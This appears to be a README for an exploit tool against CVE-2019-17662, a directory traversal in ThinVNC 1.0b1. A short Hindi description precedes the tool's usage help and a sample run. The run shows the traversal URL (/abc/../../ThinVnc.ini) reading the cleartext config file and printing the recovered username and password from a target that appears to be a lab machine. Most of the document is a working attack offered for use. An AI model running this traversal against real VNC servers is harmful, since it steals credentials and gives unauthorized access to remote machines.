
CVE-2019-17662 के लिए एक्सप्लॉइट
ThinVNC 1.0b1 मनमानी फ़ाइल पढ़ने के लिए असुरक्षित है, जो VNC सर्वर से समझौता करने की ओर ले जाता है। यह कमजोरी तब भी मौजूद है जब VNC सर्वर की तैनाती के दौरान प्रमाणीकरण चालू हो। प्रमाणीकरण के लिए पासवर्ड एक फ़ाइल में स्पष्ट पाठ (cleartext) में संग्रहीत होता है जिसे ../../ThinVnc.ini डायरेक्टरी ट्रैवर्सल हमले के माध्यम से पढ़ा जा सकता है।
~ NIST
$ ./bin/CVE-2019-17662 -h
[~] Usage: ./bin/CVE-2019-17662 -u URL [-f File]
[>] Options:
OPTIONS Desciption
-u URL Base URL
-f File [Optional] File Name To Query (Default: ThinVnc.ini)
$ ./bin/CVE-2019-17662 -u http://10.10.185.214:8080/
[+] CVE-2019-17662 exploit by @whokilleddb
[o] Target : http://10.10.185.214:8080/
[x] File To Read: ThinVnc.ini
[~] Trying to Read: http://10.10.185.214:8080/abc/../../ThinVnc.ini
[:] Trying To Fetch Credentials
[-] User=Atlas
[-] Password=H0ldUpTheHe@vens